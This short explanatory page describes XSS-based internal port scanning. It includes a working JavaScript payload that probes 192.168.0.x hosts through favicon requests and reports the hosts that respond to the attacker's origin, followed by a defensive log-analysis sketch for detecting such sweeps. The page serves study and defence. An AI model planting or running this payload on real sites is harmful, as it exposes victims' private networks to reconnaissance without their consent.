XSS Port Scanning
Overview
An attacker who is outside your internal network can get you to browse a web page containing malicious JavaScript.
Because the script runs in your browser, it can scan your internal network, and it can be modified to send the results back to the attacker.
Sample Code
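<script>
// Try every address in 192.168.0.0-255.
for (let i = 0; i < 256; i++) {
  let ip = '192.168.0.' + i
  // onload fires only when the host served a favicon, i.e. a web server answered;
  // the handler then requests /log/<ip> from the origin hosting this page.
  let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=\'/log/' + ip + '\'">'
  document.body.innerHTML += code
}
</script>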
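
On the defending side, the loop above leaves a recognisable trace: one client requesting /favicon.ico from many internal hosts within seconds. The following detection sketch is an added example, not code from the original page; the log line format, field names, thresholds and the sample lines are all constructed assumptions.

```javascript
// Assumed (constructed) log format: <ISO time> client=<ip> host=<ip> "GET <path>" referer="<url>"
const LINE = /^(\S+) client=(\S+) host=(\S+) "GET (\S+)" referer="([^"]*)"$/;

function parseLine(line) {
  const m = LINE.exec(line.trim());
  if (!m) return null;
  return { ts: Date.parse(m[1]) / 1000, client: m[2], host: m[3], path: m[4], referer: m[5] };
}

// Report clients that requested `path` on at least `minHosts` distinct
// internal hosts inside any sliding window of `windowSec` seconds.
function findFanOut(lines, { path = '/favicon.ico', minHosts = 5, windowSec = 10 } = {}) {
  const byClient = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r || r.path !== path) continue;
    if (!byClient.has(r.client)) byClient.set(r.client, []);
    byClient.get(r.client).push(r);
  }
  const alerts = [];
  for (const [client, recs] of byClient) {
    recs.sort((a, b) => a.ts - b.ts);
    let start = 0, best = 0;
    const counts = new Map(); // host -> hits inside the current window
    for (const r of recs) {
      counts.set(r.host, (counts.get(r.host) || 0) + 1);
      while (r.ts - recs[start].ts > windowSec) {
        const old = recs[start++].host;
        if (counts.get(old) === 1) counts.delete(old); else counts.set(old, counts.get(old) - 1);
      }
      best = Math.max(best, counts.size);
    }
    if (best >= minHosts) {
      // Referer is context only; browsers may omit it depending on referrer policy.
      const referers = [...new Set(recs.map(r => r.referer).filter(x => x && x !== '-'))];
      alerts.push({ client, distinctHosts: best, referers });
    }
  }
  return alerts;
}

// Constructed sample: one workstation sweeping 192.168.0.1-8, one ordinary user.
const sample = [];
for (let i = 1; i <= 8; i++) {
  sample.push(`2024-01-01T10:00:0${i}Z client=10.0.0.23 host=192.168.0.${i} "GET /favicon.ico" referer="http://lure.example/"`);
}
sample.push('2024-01-01T10:00:02Z client=10.0.0.40 host=192.168.0.5 "GET /favicon.ico" referer="-"');
sample.push('2024-01-01T10:05:00Z client=10.0.0.40 host=192.168.0.6 "GET /favicon.ico" referer="-"');
console.log(findFanOut(sample));
```

Tune minHosts and windowSec to the environment; monitoring tools that legitimately poll many hosts will need an allow list.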

References
- https://neonprimetime.blogspot.com/2015/09/cross-site-scripting-xss-that-port-scans.html